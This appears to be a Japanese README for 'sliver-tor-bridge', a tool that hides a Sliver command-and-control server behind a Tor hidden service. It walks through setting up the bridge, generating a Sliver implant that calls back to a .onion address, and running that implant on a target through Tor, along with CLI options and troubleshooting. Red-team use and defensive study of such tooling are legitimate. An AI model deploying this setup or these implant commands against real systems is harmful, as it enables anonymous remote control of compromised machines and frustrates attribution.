
Sliver C2用Torトランスポートブリッジ - 匿名のコマンド&コントロール
Sliver C2 のための Tor ベースのトランスポートブリッジ。隠しサービスを作成し、トラフィックを Sliver サーバーにプロキシすることで、実際の IP が露出するのを防ぎます。
Tor の隠しサービスをセットアップし、ローカルの HTTP プロキシを指すようにします。プロキシはすべてのリクエストを Sliver の HTTPS リスナーに転送します。インプラントは Tor を経由して接続し、通常通り Sliver で制御できます。
sliver server <---> proxy <---> tor hidden service <---> implant
:8443 :8080 xyz.onion (via tor)
git clone https://github.com/Otsmane-Ahmed/sliver-tor-bridge.git
cd sliver-tor-bridge
python3 -m venv venv
source venv/bin/activate
pip install -e .
HTTPS リスナーで Sliver を起動します:
sliver-client
sliver > https -L 127.0.0.1 -l 8443
別のターミナルでブリッジを起動します:
sudo systemctl stop tor
sliver-tor-bridge start --sliver-port 8443
出力例:
[+] Tor started successfully!
[+] Hidden Service: http://abc123xyz.onion
[+] Bridge is READY!
.onion アドレスが表示されたら、インプラントを生成します:
sliver > generate --http http://abc123xyz.onion --os linux --save /tmp/implant
ターゲット上でインプラントを実行します(Tor が必要):
HTTP_PROXY=socks5h://127.0.0.1:9050 ./implant
sliver-tor-bridge start [OPTIONS]
--sliver-port Sliver HTTPS ポート(デフォルト: 8443)
--tor-port Tor SOCKS ポート(デフォルト: 9050)
--service-port 隠しサービスポート(デフォルト: 80)
-c, --config 設定ファイルのパス
その他のコマンド:
sliver-tor-bridge status # 隠しサービスが動作しているか確認
sliver-tor-bridge stop # 隠しサービスディレクトリをクリーンアップ
graph LR
Implant[Implant] -->|Tor Network| HS["Hidden Service (.onion)"]
HS -->|TCP :8080| Proxy["Bridge Proxy"]
Proxy -->|HTTPS :8443| Sliver["Sliver Server"]ブリッジは中間に位置し、トラフィックを中継します。Sliver は通常の HTTPS 接続を受け取っていると認識し、インプラントは通常の HTTP サーバーと通信していると認識します。
docker-compose up -d
docker-compose logs -f
pip install pytest
pytest tests/
sliver_tor_bridge/
cli.py # コマンドラインインターフェース
tor_manager.py # Tor の起動と隠しサービスの作成
proxy.py # Sliver に転送する Flask アプリ
config.py # 設定の処理
tor が起動しない: システムの Tor が停止していることを確認してください(sudo systemctl stop tor)
接続タイムアウト: Tor のブートストラップに 1〜3 分かかることがあります。100% になるまで待ってください
インプラントが接続しない: インプラントが Tor にアクセスできることを確認してください(SOCKS プロキシを 9050 に設定)
MIT